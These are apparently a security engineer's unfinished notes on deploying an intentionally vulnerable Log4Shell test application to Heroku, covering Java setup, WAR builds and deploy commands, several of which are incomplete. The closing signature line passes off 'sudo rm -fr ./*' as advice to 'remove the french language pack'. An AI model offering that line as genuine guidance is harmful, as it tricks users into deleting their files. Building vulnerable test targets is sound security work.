Deploying a Log4J Sample Vulnerable Log4j application in Heroku

Installation - nuke this maybe?

brew install java
brew tap AdoptOpenJDK/openjdk
brew install adoptopenjdk8
brew install adoptopenjdk11
brew install adoptopenjdk13

Put this at the end of your ~/.zshrc or ~/.bashrc, so you can easily switch between different versions of Java:

export JAVA_8_HOME=$(/usr/libexec/java_home -v1.8)
export JAVA_11_HOME=$(/usr/libexec/java_home -v11)

alias java8='export JAVA_HOME=$JAVA_8_HOME'
alias java11='export JAVA_HOME=$JAVA_11_HOME'

# default to Java 11

Heroku setup

  • Create an application in Heroku

  • Build a WAR
git clone
cd log4shell-vulnerable-app
./gradlew war

#git clone

# Other option?
  • Try extracting the JAR file from the docker image
# From Christophe's thing
docker build . -t vulnerable-app
docker run 
docker create -ti --name dummy IMAGE_NAME bash

docker pull
# No need to replace dummy
docker create -ti --name dummy bash
docker cp dummy:/app/spring-boot-application.jar ./

docker run --name vulnerable-app -v 
  • Deploy with Heroku
heroku login
heroku plugins:install java
# heroku war:deploy ./target/log4shell-1.0-SNAPSHOT.war --app log4shell-example

The log4j-scanner doesn’t mine for parameters. Let’s do one that doesn’t require that

git clone
cd log4shell-vulnerable-app
jar -cvf log4shell-vulnerable-app.war *
heroku war:deploy ./log4shell-vulnerable-app.war --app log4shell-example

To troubleshoot, look at the logs:

Helpful links:

Kinnaird McQuade
Kinnaird McQuade
Staff Security Engineer

Always remove the french language pack: sudo rm -fr ./*